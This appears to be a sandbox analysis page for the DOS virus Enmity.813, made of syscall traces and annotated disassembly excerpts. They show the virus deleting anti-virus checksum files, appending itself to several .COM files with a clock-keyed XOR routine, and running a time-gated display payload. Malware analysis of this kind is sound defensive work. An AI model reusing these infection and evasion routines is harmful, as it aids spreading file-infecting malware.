Sample viewer

vx.netlux.org/Virus.DOS.Enmity.813


Syscalls:

Time | Syscall Op (INT 21h function number from AH, in decimal) | PC | Syscall Name
2018-12-17T22:32:34.615948761Z 26 PC: 12a7e | Set disk transfer address
2018-12-17T22:32:34.617854637Z 71 PC: 12a88 | Get current directory
2018-12-17T22:32:34.621114163Z 67 PC: 12cd4 | Get or set file attributes
2018-12-17T22:32:34.627020177Z 65 PC: 12cd8 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-17T22:32:34.633404598Z 67 PC: 12cd4 | Get or set file attributes
2018-12-17T22:32:34.639284454Z 65 PC: 12cd8 | Delete file (Filename = 'CHKLIST.MS')
2018-12-17T22:32:34.657541926Z 67 PC: 12cd4 | Get or set file attributes
2018-12-17T22:32:34.668235832Z 65 PC: 12cd8 | Delete file (Filename = 'CHKLIST.CPS')
2018-12-17T22:32:34.679955396Z 67 PC: 12cd4 | Get or set file attributes
2018-12-17T22:32:34.685782651Z 65 PC: 12cd8 | Delete file (Filename = 'IVB.NTZ')
2018-12-17T22:32:34.691909612Z 78 PC: 12a90 | Find first file
2018-12-17T22:32:34.698738044Z 67 PC: 12b92 | Get or set file attributes
2018-12-17T22:32:34.714281992Z 61 PC: 12ba7 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:32:34.725840714Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:32:34.732400465Z 66 PC: 12bf4 | Move file pointer
2018-12-17T22:32:34.733763523Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
; Disassembly shown from the return address of the "Get time" call on the row below.
; It saves the returned DX as a key, issues the 21-byte write from [bp+0x105], then
; XORs 0x17b words from [bp+0x11a] with that key into a buffer at [bp+0x4e7] and
; loads CX/DX for the 757-byte write logged at PC 12c61. The key comes from the
; clock, so those 757 bytes vary from file to file; the 21-byte block is written
; with no transformation in the visible code, which makes it the stabler thing to match on.
; The three consecutive writes in the trace add up to 21 + 757 + 35 = 813 bytes.
2018-12-17T22:32:34.736190701Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx  ; save DX from Get time (INT 21h AH=2Ch: DH=seconds, DL=hundredths) as the XOR key
0x12c23: mov cx, 0x15  ; CX = 21, byte count for the write below
0x12c26: lea dx, word ptr [bp + 0x105]  ; DX -> 21-byte block; bp+0x105 + 0x15 = bp+0x11a, where the XOR source starts
0x12c2a: pop ax  ; function code is taken from the stack, not an immediate; it was pushed outside this excerpt
0x12c2b: int 0x21  ; logged in the trace as "Write 21 bytes on handle 5" (PC 12c2d)
0x12c2d: push ax  ; reserve a stack word; its value is overwritten below
0x12c2e: push bp
0x12c2f: mov bp, sp  ; temporary frame: [bp+0] = saved BP, [bp+2] = the word just pushed
0x12c31: mov word ptr [bp + 2], 0x4001  ; patch that word to 0x4001 (high byte 0x40 = DOS write) - presumably popped into AX before the next INT 21h, outside this excerpt
0x12c36: pop bp  ; restore BP, the base register for every data reference here
0x12c37: mov cx, 0x17b  ; loop count: 0x17b (379) words
0x12c3a: mov dx, word ptr [bp + 0x40f]  ; reload the saved time value as the key
0x12c3e: lea si, word ptr [bp + 0x11a]  ; SI -> source region
0x12c42: lea di, word ptr [bp + 0x4e7]  ; DI -> output buffer
0x12c46: lodsw ax, word ptr [si]  ; AX = next source word
0x12c47: xor ax, dx  ; one fixed 16-bit key for the whole region
0x12c49: stosw word ptr es:[di], ax  ; store the transformed word
0x12c4a: loop 0x12c46  ; repeat until CX reaches 0
0x12c4c: mov cx, 0x2f5  ; CX = 757; bp+0x11a + 0x2f5 = bp+0x40f, so the key word sits right after the region written
0x12c4f: lea dx, word ptr [bp + 0x4e7]  ; DX -> the XORed buffer for the 757-byte write
2018-12-17T22:32:34.738878061Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:32:34.741530367Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-17T22:32:34.750636301Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:32:34.754372289Z 66 PC: 12c7d | Move file pointer
2018-12-17T22:32:34.756243461Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:32:34.76303341Z 87 PC: 12c9c | Get or set file date and time
2018-12-17T22:32:34.765808744Z 62 PC: 12ca0 | Close file
2018-12-17T22:32:34.773514989Z 67 PC: 12caf | Get or set file attributes
2018-12-17T22:32:34.778415173Z 79 PC: 12a90 | Find next file
2018-12-17T22:32:34.782206304Z 79 PC: 12a90 | Find next file
2018-12-17T22:32:34.784845656Z 67 PC: 12b92 | Get or set file attributes
2018-12-17T22:32:34.795095421Z 61 PC: 12ba7 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:32:34.802646971Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:32:34.808690522Z 66 PC: 12bf4 | Move file pointer
2018-12-17T22:32:34.810483823Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
; Disassembly shown from the return address of the "Get time" call on the row below.
; It saves the returned DX as a key, issues the 21-byte write from [bp+0x105], then
; XORs 0x17b words from [bp+0x11a] with that key into a buffer at [bp+0x4e7] and
; loads CX/DX for the 757-byte write logged at PC 12c61. The key comes from the
; clock, so those 757 bytes vary from file to file; the 21-byte block is written
; with no transformation in the visible code, which makes it the stabler thing to match on.
; The three consecutive writes in the trace add up to 21 + 757 + 35 = 813 bytes.
2018-12-17T22:32:34.815839057Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx  ; save DX from Get time (INT 21h AH=2Ch: DH=seconds, DL=hundredths) as the XOR key
0x12c23: mov cx, 0x15  ; CX = 21, byte count for the write below
0x12c26: lea dx, word ptr [bp + 0x105]  ; DX -> 21-byte block; bp+0x105 + 0x15 = bp+0x11a, where the XOR source starts
0x12c2a: pop ax  ; function code is taken from the stack, not an immediate; it was pushed outside this excerpt
0x12c2b: int 0x21  ; logged in the trace as "Write 21 bytes on handle 5" (PC 12c2d)
0x12c2d: push ax  ; reserve a stack word; its value is overwritten below
0x12c2e: push bp
0x12c2f: mov bp, sp  ; temporary frame: [bp+0] = saved BP, [bp+2] = the word just pushed
0x12c31: mov word ptr [bp + 2], 0x4001  ; patch that word to 0x4001 (high byte 0x40 = DOS write) - presumably popped into AX before the next INT 21h, outside this excerpt
0x12c36: pop bp  ; restore BP, the base register for every data reference here
0x12c37: mov cx, 0x17b  ; loop count: 0x17b (379) words
0x12c3a: mov dx, word ptr [bp + 0x40f]  ; reload the saved time value as the key
0x12c3e: lea si, word ptr [bp + 0x11a]  ; SI -> source region
0x12c42: lea di, word ptr [bp + 0x4e7]  ; DI -> output buffer
0x12c46: lodsw ax, word ptr [si]  ; AX = next source word
0x12c47: xor ax, dx  ; one fixed 16-bit key for the whole region
0x12c49: stosw word ptr es:[di], ax  ; store the transformed word
0x12c4a: loop 0x12c46  ; repeat until CX reaches 0
0x12c4c: mov cx, 0x2f5  ; CX = 757; bp+0x11a + 0x2f5 = bp+0x40f, so the key word sits right after the region written
0x12c4f: lea dx, word ptr [bp + 0x4e7]  ; DX -> the XORed buffer for the 757-byte write
2018-12-17T22:32:34.818455289Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:32:34.821908916Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-17T22:32:34.830908982Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:32:34.834218876Z 66 PC: 12c7d | Move file pointer
2018-12-17T22:32:34.835887092Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:32:34.842573335Z 87 PC: 12c9c | Get or set file date and time
2018-12-17T22:32:34.84480802Z 62 PC: 12ca0 | Close file
2018-12-17T22:32:34.852488293Z 67 PC: 12caf | Get or set file attributes
2018-12-17T22:32:34.85709346Z 79 PC: 12a90 | Find next file
2018-12-17T22:32:34.86027813Z 67 PC: 12b92 | Get or set file attributes
2018-12-17T22:32:34.869831269Z 61 PC: 12ba7 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:32:34.876332667Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:32:34.883697121Z 66 PC: 12bf4 | Move file pointer
2018-12-17T22:32:34.885287761Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
; Disassembly shown from the return address of the "Get time" call on the row below.
; It saves the returned DX as a key, issues the 21-byte write from [bp+0x105], then
; XORs 0x17b words from [bp+0x11a] with that key into a buffer at [bp+0x4e7] and
; loads CX/DX for the 757-byte write logged at PC 12c61. The key comes from the
; clock, so those 757 bytes vary from file to file; the 21-byte block is written
; with no transformation in the visible code, which makes it the stabler thing to match on.
; The three consecutive writes in the trace add up to 21 + 757 + 35 = 813 bytes.
2018-12-17T22:32:34.887955516Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx  ; save DX from Get time (INT 21h AH=2Ch: DH=seconds, DL=hundredths) as the XOR key
0x12c23: mov cx, 0x15  ; CX = 21, byte count for the write below
0x12c26: lea dx, word ptr [bp + 0x105]  ; DX -> 21-byte block; bp+0x105 + 0x15 = bp+0x11a, where the XOR source starts
0x12c2a: pop ax  ; function code is taken from the stack, not an immediate; it was pushed outside this excerpt
0x12c2b: int 0x21  ; logged in the trace as "Write 21 bytes on handle 5" (PC 12c2d)
0x12c2d: push ax  ; reserve a stack word; its value is overwritten below
0x12c2e: push bp
0x12c2f: mov bp, sp  ; temporary frame: [bp+0] = saved BP, [bp+2] = the word just pushed
0x12c31: mov word ptr [bp + 2], 0x4001  ; patch that word to 0x4001 (high byte 0x40 = DOS write) - presumably popped into AX before the next INT 21h, outside this excerpt
0x12c36: pop bp  ; restore BP, the base register for every data reference here
0x12c37: mov cx, 0x17b  ; loop count: 0x17b (379) words
0x12c3a: mov dx, word ptr [bp + 0x40f]  ; reload the saved time value as the key
0x12c3e: lea si, word ptr [bp + 0x11a]  ; SI -> source region
0x12c42: lea di, word ptr [bp + 0x4e7]  ; DI -> output buffer
0x12c46: lodsw ax, word ptr [si]  ; AX = next source word
0x12c47: xor ax, dx  ; one fixed 16-bit key for the whole region
0x12c49: stosw word ptr es:[di], ax  ; store the transformed word
0x12c4a: loop 0x12c46  ; repeat until CX reaches 0
0x12c4c: mov cx, 0x2f5  ; CX = 757; bp+0x11a + 0x2f5 = bp+0x40f, so the key word sits right after the region written
0x12c4f: lea dx, word ptr [bp + 0x4e7]  ; DX -> the XORed buffer for the 757-byte write
2018-12-17T22:32:34.890653131Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:32:34.893449563Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-17T22:32:34.901279906Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:32:34.904414368Z 66 PC: 12c7d | Move file pointer
2018-12-17T22:32:34.905979603Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:32:34.912613018Z 87 PC: 12c9c | Get or set file date and time
2018-12-17T22:32:34.915067676Z 62 PC: 12ca0 | Close file
2018-12-17T22:32:34.922909575Z 67 PC: 12caf | Get or set file attributes
2018-12-17T22:32:34.927957614Z 79 PC: 12a90 | Find next file
2018-12-17T22:32:34.931038331Z 67 PC: 12b92 | Get or set file attributes
2018-12-17T22:32:34.940624248Z 61 PC: 12ba7 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:32:34.947664909Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:32:34.954779298Z 66 PC: 12bf4 | Move file pointer
2018-12-17T22:32:34.956124029Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
; Disassembly shown from the return address of the "Get time" call on the row below.
; It saves the returned DX as a key, issues the 21-byte write from [bp+0x105], then
; XORs 0x17b words from [bp+0x11a] with that key into a buffer at [bp+0x4e7] and
; loads CX/DX for the 757-byte write logged at PC 12c61. The key comes from the
; clock, so those 757 bytes vary from file to file; the 21-byte block is written
; with no transformation in the visible code, which makes it the stabler thing to match on.
; The three consecutive writes in the trace add up to 21 + 757 + 35 = 813 bytes.
2018-12-17T22:32:34.958459179Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx  ; save DX from Get time (INT 21h AH=2Ch: DH=seconds, DL=hundredths) as the XOR key
0x12c23: mov cx, 0x15  ; CX = 21, byte count for the write below
0x12c26: lea dx, word ptr [bp + 0x105]  ; DX -> 21-byte block; bp+0x105 + 0x15 = bp+0x11a, where the XOR source starts
0x12c2a: pop ax  ; function code is taken from the stack, not an immediate; it was pushed outside this excerpt
0x12c2b: int 0x21  ; logged in the trace as "Write 21 bytes on handle 5" (PC 12c2d)
0x12c2d: push ax  ; reserve a stack word; its value is overwritten below
0x12c2e: push bp
0x12c2f: mov bp, sp  ; temporary frame: [bp+0] = saved BP, [bp+2] = the word just pushed
0x12c31: mov word ptr [bp + 2], 0x4001  ; patch that word to 0x4001 (high byte 0x40 = DOS write) - presumably popped into AX before the next INT 21h, outside this excerpt
0x12c36: pop bp  ; restore BP, the base register for every data reference here
0x12c37: mov cx, 0x17b  ; loop count: 0x17b (379) words
0x12c3a: mov dx, word ptr [bp + 0x40f]  ; reload the saved time value as the key
0x12c3e: lea si, word ptr [bp + 0x11a]  ; SI -> source region
0x12c42: lea di, word ptr [bp + 0x4e7]  ; DI -> output buffer
0x12c46: lodsw ax, word ptr [si]  ; AX = next source word
0x12c47: xor ax, dx  ; one fixed 16-bit key for the whole region
0x12c49: stosw word ptr es:[di], ax  ; store the transformed word
0x12c4a: loop 0x12c46  ; repeat until CX reaches 0
0x12c4c: mov cx, 0x2f5  ; CX = 757; bp+0x11a + 0x2f5 = bp+0x40f, so the key word sits right after the region written
0x12c4f: lea dx, word ptr [bp + 0x4e7]  ; DX -> the XORed buffer for the 757-byte write
2018-12-17T22:32:34.96111768Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:32:34.963842437Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-17T22:32:34.971631443Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:32:34.974708927Z 66 PC: 12c7d | Move file pointer
2018-12-17T22:32:34.975991103Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:32:34.982279274Z 87 PC: 12c9c | Get or set file date and time
2018-12-17T22:32:34.98426212Z 62 PC: 12ca0 | Close file
2018-12-17T22:32:34.992030519Z 67 PC: 12caf | Get or set file attributes
2018-12-17T22:32:34.998490506Z 79 PC: 12a90 | Find next file
2018-12-17T22:32:35.001870263Z 67 PC: 12b92 | Get or set file attributes
2018-12-17T22:32:35.012040245Z 61 PC: 12ba7 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:32:35.018420551Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:32:35.025651329Z 66 PC: 12bf4 | Move file pointer
2018-12-17T22:32:35.027300374Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
; Disassembly shown from the return address of the "Get time" call on the row below.
; It saves the returned DX as a key, issues the 21-byte write from [bp+0x105], then
; XORs 0x17b words from [bp+0x11a] with that key into a buffer at [bp+0x4e7] and
; loads CX/DX for the 757-byte write logged at PC 12c61. The key comes from the
; clock, so those 757 bytes vary from file to file; the 21-byte block is written
; with no transformation in the visible code, which makes it the stabler thing to match on.
; The three consecutive writes in the trace add up to 21 + 757 + 35 = 813 bytes.
2018-12-17T22:32:35.030209233Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx  ; save DX from Get time (INT 21h AH=2Ch: DH=seconds, DL=hundredths) as the XOR key
0x12c23: mov cx, 0x15  ; CX = 21, byte count for the write below
0x12c26: lea dx, word ptr [bp + 0x105]  ; DX -> 21-byte block; bp+0x105 + 0x15 = bp+0x11a, where the XOR source starts
0x12c2a: pop ax  ; function code is taken from the stack, not an immediate; it was pushed outside this excerpt
0x12c2b: int 0x21  ; logged in the trace as "Write 21 bytes on handle 5" (PC 12c2d)
0x12c2d: push ax  ; reserve a stack word; its value is overwritten below
0x12c2e: push bp
0x12c2f: mov bp, sp  ; temporary frame: [bp+0] = saved BP, [bp+2] = the word just pushed
0x12c31: mov word ptr [bp + 2], 0x4001  ; patch that word to 0x4001 (high byte 0x40 = DOS write) - presumably popped into AX before the next INT 21h, outside this excerpt
0x12c36: pop bp  ; restore BP, the base register for every data reference here
0x12c37: mov cx, 0x17b  ; loop count: 0x17b (379) words
0x12c3a: mov dx, word ptr [bp + 0x40f]  ; reload the saved time value as the key
0x12c3e: lea si, word ptr [bp + 0x11a]  ; SI -> source region
0x12c42: lea di, word ptr [bp + 0x4e7]  ; DI -> output buffer
0x12c46: lodsw ax, word ptr [si]  ; AX = next source word
0x12c47: xor ax, dx  ; one fixed 16-bit key for the whole region
0x12c49: stosw word ptr es:[di], ax  ; store the transformed word
0x12c4a: loop 0x12c46  ; repeat until CX reaches 0
0x12c4c: mov cx, 0x2f5  ; CX = 757; bp+0x11a + 0x2f5 = bp+0x40f, so the key word sits right after the region written
0x12c4f: lea dx, word ptr [bp + 0x4e7]  ; DX -> the XORed buffer for the 757-byte write
2018-12-17T22:32:35.032698625Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:32:35.036507769Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-17T22:32:35.044358692Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:32:35.047182733Z 66 PC: 12c7d | Move file pointer
2018-12-17T22:32:35.050384202Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:32:35.057400418Z 87 PC: 12c9c | Get or set file date and time
2018-12-17T22:32:35.059132976Z 62 PC: 12ca0 | Close file
2018-12-17T22:32:35.067307066Z 67 PC: 12caf | Get or set file attributes
2018-12-17T22:32:35.0722726Z 79 PC: 12a90 | Find next file
2018-12-17T22:32:35.07521203Z 67 PC: 12b92 | Get or set file attributes
2018-12-17T22:32:35.085758954Z 61 PC: 12ba7 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:32:35.092347172Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:32:35.099474098Z 66 PC: 12bf4 | Move file pointer
2018-12-17T22:32:35.10231599Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
; Disassembly shown from the return address of the "Get time" call on the row below.
; It saves the returned DX as a key, issues the 21-byte write from [bp+0x105], then
; XORs 0x17b words from [bp+0x11a] with that key into a buffer at [bp+0x4e7] and
; loads CX/DX for the 757-byte write logged at PC 12c61. The key comes from the
; clock, so those 757 bytes vary from file to file; the 21-byte block is written
; with no transformation in the visible code, which makes it the stabler thing to match on.
; The three consecutive writes in the trace add up to 21 + 757 + 35 = 813 bytes.
2018-12-17T22:32:35.104825167Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx  ; save DX from Get time (INT 21h AH=2Ch: DH=seconds, DL=hundredths) as the XOR key
0x12c23: mov cx, 0x15  ; CX = 21, byte count for the write below
0x12c26: lea dx, word ptr [bp + 0x105]  ; DX -> 21-byte block; bp+0x105 + 0x15 = bp+0x11a, where the XOR source starts
0x12c2a: pop ax  ; function code is taken from the stack, not an immediate; it was pushed outside this excerpt
0x12c2b: int 0x21  ; logged in the trace as "Write 21 bytes on handle 5" (PC 12c2d)
0x12c2d: push ax  ; reserve a stack word; its value is overwritten below
0x12c2e: push bp
0x12c2f: mov bp, sp  ; temporary frame: [bp+0] = saved BP, [bp+2] = the word just pushed
0x12c31: mov word ptr [bp + 2], 0x4001  ; patch that word to 0x4001 (high byte 0x40 = DOS write) - presumably popped into AX before the next INT 21h, outside this excerpt
0x12c36: pop bp  ; restore BP, the base register for every data reference here
0x12c37: mov cx, 0x17b  ; loop count: 0x17b (379) words
0x12c3a: mov dx, word ptr [bp + 0x40f]  ; reload the saved time value as the key
0x12c3e: lea si, word ptr [bp + 0x11a]  ; SI -> source region
0x12c42: lea di, word ptr [bp + 0x4e7]  ; DI -> output buffer
0x12c46: lodsw ax, word ptr [si]  ; AX = next source word
0x12c47: xor ax, dx  ; one fixed 16-bit key for the whole region
0x12c49: stosw word ptr es:[di], ax  ; store the transformed word
0x12c4a: loop 0x12c46  ; repeat until CX reaches 0
0x12c4c: mov cx, 0x2f5  ; CX = 757; bp+0x11a + 0x2f5 = bp+0x40f, so the key word sits right after the region written
0x12c4f: lea dx, word ptr [bp + 0x4e7]  ; DX -> the XORed buffer for the 757-byte write
2018-12-17T22:32:35.107051412Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:32:35.115546374Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-17T22:32:35.123498788Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:32:35.126006242Z 66 PC: 12c7d | Move file pointer
2018-12-17T22:32:35.128295057Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:32:35.135274532Z 87 PC: 12c9c | Get or set file date and time
2018-12-17T22:32:35.136719893Z 62 PC: 12ca0 | Close file
2018-12-17T22:32:35.147796557Z 67 PC: 12caf | Get or set file attributes
2018-12-17T22:32:35.153242311Z 79 PC: 12a90 | Find next file
2018-12-17T22:32:35.15630887Z 67 PC: 12b92 | Get or set file attributes
2018-12-17T22:32:35.167232649Z 61 PC: 12ba7 | Open file (Filename = 'PAH.COM')
2018-12-17T22:32:35.174200076Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:32:35.180959074Z 66 PC: 12bf4 | Move file pointer
2018-12-17T22:32:35.182767834Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
; Disassembly shown from the return address of the "Get time" call on the row below.
; It saves the returned DX as a key, issues the 21-byte write from [bp+0x105], then
; XORs 0x17b words from [bp+0x11a] with that key into a buffer at [bp+0x4e7] and
; loads CX/DX for the 757-byte write logged at PC 12c61. The key comes from the
; clock, so those 757 bytes vary from file to file; the 21-byte block is written
; with no transformation in the visible code, which makes it the stabler thing to match on.
; The three consecutive writes in the trace add up to 21 + 757 + 35 = 813 bytes.
2018-12-17T22:32:35.184496254Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx  ; save DX from Get time (INT 21h AH=2Ch: DH=seconds, DL=hundredths) as the XOR key
0x12c23: mov cx, 0x15  ; CX = 21, byte count for the write below
0x12c26: lea dx, word ptr [bp + 0x105]  ; DX -> 21-byte block; bp+0x105 + 0x15 = bp+0x11a, where the XOR source starts
0x12c2a: pop ax  ; function code is taken from the stack, not an immediate; it was pushed outside this excerpt
0x12c2b: int 0x21  ; logged in the trace as "Write 21 bytes on handle 5" (PC 12c2d)
0x12c2d: push ax  ; reserve a stack word; its value is overwritten below
0x12c2e: push bp
0x12c2f: mov bp, sp  ; temporary frame: [bp+0] = saved BP, [bp+2] = the word just pushed
0x12c31: mov word ptr [bp + 2], 0x4001  ; patch that word to 0x4001 (high byte 0x40 = DOS write) - presumably popped into AX before the next INT 21h, outside this excerpt
0x12c36: pop bp  ; restore BP, the base register for every data reference here
0x12c37: mov cx, 0x17b  ; loop count: 0x17b (379) words
0x12c3a: mov dx, word ptr [bp + 0x40f]  ; reload the saved time value as the key
0x12c3e: lea si, word ptr [bp + 0x11a]  ; SI -> source region
0x12c42: lea di, word ptr [bp + 0x4e7]  ; DI -> output buffer
0x12c46: lodsw ax, word ptr [si]  ; AX = next source word
0x12c47: xor ax, dx  ; one fixed 16-bit key for the whole region
0x12c49: stosw word ptr es:[di], ax  ; store the transformed word
0x12c4a: loop 0x12c46  ; repeat until CX reaches 0
0x12c4c: mov cx, 0x2f5  ; CX = 757; bp+0x11a + 0x2f5 = bp+0x40f, so the key word sits right after the region written
0x12c4f: lea dx, word ptr [bp + 0x4e7]  ; DX -> the XORed buffer for the 757-byte write
2018-12-17T22:32:35.186109231Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:32:35.189212365Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-17T22:32:35.195924857Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:32:35.198581031Z 66 PC: 12c7d | Move file pointer
2018-12-17T22:32:35.200212005Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:32:35.204711789Z 87 PC: 12c9c | Get or set file date and time
2018-12-17T22:32:35.205852416Z 62 PC: 12ca0 | Close file
2018-12-17T22:32:35.214703699Z 67 PC: 12caf | Get or set file attributes
2018-12-17T22:32:35.218523986Z 79 PC: 12a90 | Find next file
2018-12-17T22:32:35.221137631Z 67 PC: 12b92 | Get or set file attributes
2018-12-17T22:32:35.231287674Z 61 PC: 12ba7 | Open file (Filename = 'TEST.COM')
2018-12-17T22:32:35.23768968Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:32:35.244343196Z 87 PC: 12c9c | Get or set file date and time
2018-12-17T22:32:35.246850937Z 62 PC: 12ca0 | Close file
2018-12-17T22:32:35.25483214Z 67 PC: 12caf | Get or set file attributes
2018-12-17T22:32:35.25966368Z 79 PC: 12a90 | Find next file
2018-12-17T22:32:35.263087625Z 59 PC: 12aa1 | Change current directory
2018-12-17T22:32:35.267792437Z 71 PC: 12abe | Get current directory
2018-12-17T22:32:35.275486799Z 59 PC: 12ae8 | Change current directory
2018-12-17T22:32:35.289246915Z 59 PC: 12b03 | Change current directory
; Disassembly shown from the return address of the "Get time" call on the row below.
; Time-gated display routine: when the returned DX is 5 or less (seconds = 0 and
; hundredths <= 5) it sets video mode 0Dh, prints the zero-terminated string at
; [bp+0x3a4] with BIOS teletype output, waits for a keystroke and sets video mode 3;
; otherwise it jumps straight to 0x12b2e. The gate is a sub-second window once a
; minute, so a single sandbox run will usually not take this branch.
; NOTE(review): every row in this table is an INT 21h call, so the INT 10h/16h calls
; here would presumably not be logged even when the branch runs - confirm against the tracer.
2018-12-17T22:32:35.290947354Z 44 PC: 12b07 | Get time 0x12b07: cmp dx, 5  ; DX from Get time (INT 21h AH=2Ch: DH=seconds, DL=hundredths)
0x12b0a: ja 0x12b2e  ; unsigned DX > 5: skip the display routine
0x12b0c: mov ax, 0xd  ; AH=00h set video mode, AL=0Dh (320x200 16-colour graphics)
0x12b0f: int 0x10
0x12b11: lea si, word ptr [bp + 0x3a4]  ; SI -> message bytes
0x12b15: cld  ; string reads move forward
0x12b16: lodsb al, byte ptr [si]  ; AL = next character
0x12b17: or al, al  ; a zero byte ends the message
0x12b19: je 0x12b25
0x12b1b: mov ah, 0xe  ; INT 10h AH=0Eh teletype output
0x12b1d: xor bh, bh  ; display page 0
0x12b1f: mov bl, 5  ; colour 5
0x12b21: int 0x10
0x12b23: jmp 0x12b15  ; next character
0x12b25: xor ax, ax  ; AH=00h
0x12b27: int 0x16  ; BIOS keyboard read: blocks until a key is pressed
0x12b29: mov ax, 3  ; AH=00h set video mode, AL=03h (80x25 text)
0x12b2c: int 0x10
0x12b2e: push ax  ; both paths join here; the code continues outside this excerpt
0x12b2f: push bp
2018-12-17T22:32:35.292961798Z 26 PC: 12b3e | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":5819,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number from AH, in decimal) | PC | Syscall Name
2018-12-25T11:55:27.41160059Z 26 PC: 12a7e | Set disk transfer address
2018-12-25T11:55:27.413750379Z 71 PC: 12a88 | Get current directory
2018-12-25T11:55:27.416750707Z 67 PC: 12cd4 | Get or set file attributes
2018-12-25T11:55:27.42244474Z 65 PC: 12cd8 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T11:55:27.433446204Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:27.443877401Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:27.450283174Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:27.457457274Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:27.463131171Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:27.468558468Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:27.474114213Z 78 PC: 12a90 | Find first file
2018-12-25T11:55:27.480694214Z 67 PC: 12b92 | Get or set file attributes
2018-12-25T11:55:27.497147658Z 61 PC: 12ba7 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:27.504012681Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:55:27.535410794Z 66 PC: 12bf4 | Move file pointer
2018-12-25T11:55:27.541348552Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
; Disassembly shown from the return address of the "Get time" call on the row below.
; It saves the returned DX as a key, issues the 21-byte write from [bp+0x105], then
; XORs 0x17b words from [bp+0x11a] with that key into a buffer at [bp+0x4e7] and
; loads CX/DX for the 757-byte write logged at PC 12c61. The key comes from the
; clock, so those 757 bytes vary from file to file; the 21-byte block is written
; with no transformation in the visible code, which makes it the stabler thing to match on.
; The three consecutive writes in the trace add up to 21 + 757 + 35 = 813 bytes.
